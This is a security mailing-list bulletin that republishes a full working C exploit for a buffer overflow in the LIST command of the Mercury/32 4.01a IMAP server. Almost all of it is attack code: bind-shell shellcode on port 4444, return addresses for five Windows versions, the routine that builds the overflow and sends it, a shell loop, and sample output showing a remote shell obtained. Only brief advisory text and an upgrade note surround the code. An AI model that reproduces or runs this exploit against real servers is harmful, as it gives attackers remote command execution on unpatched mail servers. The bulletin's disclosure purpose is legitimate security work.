[EXPL] Mercury/32 Mail Buffer Overflow (LIST, Exploit)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Mercury/32 Mail Buffer Overflow (LIST, Exploit)
------------------------------------------------------------------------


SUMMARY

Mercury is "a free, standards-based mail server solution, providing 
comprehensive, fast server support for all major Internet e-mail 
protocols. It is supplied in two versions, one hosted on Windows systems, 
the other running as a set of NLMs on Novell NetWare file servers".

This exploit binds shell on port 4444, by exploiting previously reported 
buffer overflow vulnerability in Mercury Mail.

DETAILS

Vulnerable Systems:
 * Mercury/32 version 4.01a

Immune Systems:
 *  * Mercury/32 version 4.01b and later

/*
  Mercury imap4 server remote buffer overflow exploit
  author : c0d3r "kaveh razavi" c0d3r@ihsteam.com c0d3r@c0d3r.org
  package : Mercury mail transport system 4.01a and prolly prior
  workaround : upgrade to 4.01b version
  advisory : not available right now
  company address : www.pmail.com
  timeline :
  15 Sep 2005 : vulnerability reported by securiteam mailing list
  20 Sep 2005 : IHS exploit released
  exploit features :
  1) 5 working targets including win2k , winxp , win2k3
  2) reliable metasploit shellcode
  3) autoconnect to shell
  bad chars are : 0x20 0x0a
  compiled with visual c++ 6 : cl mercury_imap.c
  greeting to :
  www.ihsteam.com       the team , LorD and NT heya
  www.ihsteam.net       english version ,
  www.exploitdev.com    Jamie and Ben the two good brothers also my 
brothers
  www.metasploit.com    when are you gonna release the newer version :P ?
  www.class101.org      class with his new laptop :>
  www.milw0rm.com       str0ke , I am sending it to you first dont doubt 
:d
  www.c0d3r.org         study time started :((( , pitty for the c0d3r !
  shout to actionspider
  read these lines and try to understand ( I know you cant akhey ) that
  an script kiddie (defacer) never ever could be compared to an exploit 
coder
  try to grow , being grown up is not related to age  -- with respects
/*
/*

D:\projects>mercury_imap.exe ihs 143 4 c0d3r abc

-------- mercury imap remote BOF exploit by c0d3r

[+] target : windows 2003 server enterprise service pack 1
[+] building login data
[+] building overflow string
[+] attacking host ihs
[+] packet size = 625 byte
[+] connected
[+] sending login info
[+] sending exploit string
[+] exploit sent successfully to ihs
[+] trying to get shell
[+] connecting to ihs on port 4444
[+] target exploited successfully
[+] Dropping into shell

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

H:\MERCURY>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 625
// nops + return address + 16 nops + shellcode 260 + 4 + 16 + 344 + 1

// metasploit shellcode LPORT=4444 Size=344 Encoder=PexFnstenvSub
// bad chars : 0x00 0x0a 0x20 0x0d

char shellcode[]=
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92"
"\xc9\xd2\x3b\x83\xeb\xfc\xe2\xf4\x6e\xa3\x39\x76\x7a\x30\x2d\xc4"
"\x6d\xa9\x59\x57\xb6\xed\x59\x7e\xae\x42\xae\x3e\xea\xc8\x3d\xb0"
"\xdd\xd1\x59\x64\xb2\xc8\x39\x72\x19\xfd\x59\x3a\x7c\xf8\x12\xa2"
"\x3e\x4d\x12\x4f\x95\x08\x18\x36\x93\x0b\x39\xcf\xa9\x9d\xf6\x13"
"\xe7\x2c\x59\x64\xb6\xc8\x39\x5d\x19\xc5\x99\xb0\xcd\xd5\xd3\xd0"
"\x91\xe5\x59\xb2\xfe\xed\xce\x5a\x51\xf8\x09\x5f\x19\x8a\xe2\xb0"
"\xd2\xc5\x59\x4b\x8e\x64\x59\x7b\x9a\x97\xba\xb5\xdc\xc7\x3e\x6b"
"\x6d\x1f\xb4\x68\xf4\xa1\xe1\x09\xfa\xbe\xa1\x09\xcd\x9d\x2d\xeb"
"\xfa\x02\x3f\xc7\xa9\x99\x2d\xed\xcd\x40\x37\x5d\x13\x24\xda\x39"
"\xc7\xa3\xd0\xc4\x42\xa1\x0b\x32\x67\x64\x85\xc4\x44\x9a\x81\x68"
"\xc1\x9a\x91\x68\xd1\x9a\x2d\xeb\xf4\xa1\xc3\x67\xf4\x9a\x5b\xda"
"\x07\xa1\x76\x21\xe2\x0e\x85\xc4\x44\xa3\xc2\x6a\xc7\x36\x02\x53"
"\x36\x64\xfc\xd2\xc5\x36\x04\x68\xc7\x36\x02\x53\x77\x80\x54\x72"
"\xc5\x36\x04\x6b\xc6\x9d\x87\xc4\x42\x5a\xba\xdc\xeb\x0f\xab\x6c"
"\x6d\x1f\x87\xc4\x42\xaf\xb8\x5f\xf4\xa1\xb1\x56\x1b\x2c\xb8\x6b"
"\xcb\xe0\x1e\xb2\x75\xa3\x96\xb2\x70\xf8\x12\xc8\x38\x37\x90\x16"
"\x6c\x8b\xfe\xa8\x1f\xb3\xea\x90\x39\x62\xba\x49\x6c\x7a\xc4\xc4"
"\xe7\x8d\x2d\xed\xc9\x9e\x80\x6a\xc3\x98\xb8\x3a\xc3\x98\x87\x6a"
"\x6d\x19\xba\x96\x4b\xcc\x1c\x68\x6d\x1f\xb8\xc4\x6d\xfe\x2d\xeb"
"\x19\x9e\x2e\xb8\x56\xad\x2d\xed\xc0\x36\x02\x53\x62\x43\xd6\x64"
"\xc1\x36\x04\xc4\x42\xc9\xd2\x3b";

void gotshell (int newsock);
unsigned int rc,sock,os,addr,rc2 ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
char buffer[size];
char point_esp[5];
unsigned short port;
char req1[] =  "\x30\x30\x30\x30\x20\x4C\x4F\x47\x49\x4E";
char req2[] =  "\x30\x30\x30\x31";
unsigned char *login,*exploit;
char vuln_command[] = "\x4C\x49\x53\x54";
         // jmp esp in ntdll
char winxpsp1[]   = "\xCC\x59\xFB\x77";
         // jmp esp (not tested)
char winxpsp2[]   = "\xED\x1E\x94\x7C";
         // call esp in kernel32.dll
char win2ksp4[]   = "\x23\xde\xaf\x01";
         // jmp esp in ntdll
char win2k3_sp0[] = "\xAB\x8B\xFB\x77";
         // push esp - ret in kernel32
char win2k3_sp1[] = "\x6A\xFA\xE8\x77";

int main (int argc, char *argv[])
{

 if(argc < 6)
 {
  printf("\n-------- mercury imap remote BOF exploit by c0d3r\n");
  printf("-------- usage : imap.exe host port target username 
password\n");
  printf("-------- target 1 : windows xp service pack 1         : 0\n");
  printf("-------- target 2 : windows xp service pack 2         : 1\n");
  printf("-------- target 3 : windoes 2k advanced server sp 4   : 2\n");
  printf("-------- target 4 : windoes 2k3 server enterprise sp0 : 3\n");
  printf("-------- target 5 : windoes 2k3 server enterprise sp1 : 4\n");
  printf("-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abc\n\n");
  exit(-1) ;
 }
 printf("\n-------- mercury imap remote BOF exploit by c0d3r\n\n");
 os = (unsigned short)atoi(argv[3]);
 switch(os)
 {
  case 0:
   strcat(point_esp,winxpsp1);
   printf("[+] target : windows xp service pack 1\n");
   break;
  case 1:
   strcat(point_esp,winxpsp2);
   printf("[+] target : windows xp service pack 2\n");
   break;
  case 2:
   strcat(point_esp,win2ksp4);
   printf("[+] target : windows 2000 advanced server service pack 4\n");
   break;
  case 3:
   strcat(point_esp,win2k3_sp0);
   printf("[+] target : windows 2003 server enterprise service pack 0\n");
   break;
  case 4:
   strcat(point_esp,win2k3_sp1);
   printf("[+] target : windows 2003 server enterprise service pack 1\n");
   break;
  default:
   printf("\n[-] this target doesnt exist in the list\n\n");

   exit(-1);
 }

 printf("[+] building login data\n");
 login = malloc(256);
 memset(login,0,256);
 sprintf(login,"%s %s %s\r\n",req1,argv[4],argv[5]);

 // Creating heart of exploit code 4 5

 printf("[+] building overflow string");

 memset(buffer,NOP,size);
 memcpy(buffer+260,point_esp,sizeof(point_esp)-1);
 memcpy(buffer+280,shellcode,sizeof(shellcode)-1);
 buffer[size] = 0;
 exploit = malloc(1000);
 memset(exploit,0,1000);
 sprintf(exploit,"%s %s %s\r\n",req2,vuln_command,buffer);

 // EO heart of exploit code

 if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
 {
  printf("[-] WSAStartup failed !\n");
  exit(-1);
 }
 hp = gethostbyname(argv[1]);
 Sleep(1500);
 if (!hp)
 {
  addr = inet_addr(argv[1]);
 }
 if ((!hp)  && (addr == INADDR_NONE) )
 {
  printf("[-] unable to resolve %s\n",argv[1]);
  exit(-1);
 }
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 if (!sock)
 {
  printf("[-] socket() error...\n");
  exit(-1);
 }
 if (hp != NULL)
  memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
 else
  tcp.sin_addr.s_addr = addr;

 if (hp)
  tcp.sin_family = hp->h_addrtype;
 else
  tcp.sin_family = AF_INET;
 port=atoi(argv[2]);
 tcp.sin_port=htons(port);

 printf("\n[+] attacking host %s\n" , argv[1]) ;

 Sleep(1000);

 printf("[+] packet size = %d byte\n" , sizeof(buffer));

 rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
 if(rc==0)
 {

  Sleep(1500) ;
  printf("[+] connected\n") ;
  printf("[+] sending login info\n") ;
  send(sock,login,strlen(login),0);
  Sleep(1500);
  printf("[+] sending exploit string\n") ;
  send(sock,exploit,strlen(exploit),0);
  Sleep(1500);
  printf("[+] exploit sent successfully to %s \n" , argv[1]);
  printf("[+] trying to get shell\n");
  printf("[+] connecting to %s on port 4444\n",argv[1]);
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  Sleep(1500);
  if (!sock)
  {
   printf("[-] socket() error...\n");
   exit(-1);
  }
  tcp.sin_family = AF_INET;
  tcp.sin_port=htons(4444);
  rc2=connect(sock, (struct sockaddr *) &tcp, sizeof (struct 
sockaddr_in));
  if(rc2 != 0)
  {
   printf("[-] exploit probably failed\n");
   exit(-1);
  }
  if(rc2==0)
  {
   printf("[+] target exploited successfully\n");
   printf("[+] Dropping into shell\n\n");
   gotshell(sock);
  }
 }

 else
 {
  printf("[-] ouch! Server is not listening .... \n");
 }
 shutdown(sock,1);
 closesocket(sock);
}


void gotshell(int new_sock)
{
 struct timeval tv;
 int length;
 unsigned long o[2];
 char bufferx[1000];

 tv.tv_sec = 1;
 tv.tv_usec = 0;

 while (1)
 {

  o[0] = 1;
  o[1] = new_sock;

  length = select (0, (fd_set *)&o, NULL, NULL, &tv);
  if(length == 1)
  {
   length = recv (new_sock, bufferx, sizeof (bufferx), 0);
   if (length <= 0)
   {
    printf ("[-] Connection closed.\n");
    WSACleanup();
    return;
   }
   length = write (1, bufferx, length);
   if (length <= 0)
   {
    printf("[-] Connection closed.\n");
    WSACleanup();
    return;
   }
  }
  else
  {
   length = read (0, bufferx, sizeof (bufferx));
   if (length <= 0)
   {
    printf("[-] Connection closed.\n");
    WSACleanup();
    return;
   }
   length = send(new_sock, bufferx, length, 0);
   if (length <= 0)
   {
    printf("[-] Connection closed.\n");
    WSACleanup();
    return;
   }
  }
 }
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:c0d3r@ihsteam.com> c0d3r.
Related advisory:  
<http://www.securiteam.com/securitynews/5TP0D0UGVO.html> 
http://www.securiteam.com/securitynews/5TP0D0UGVO.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.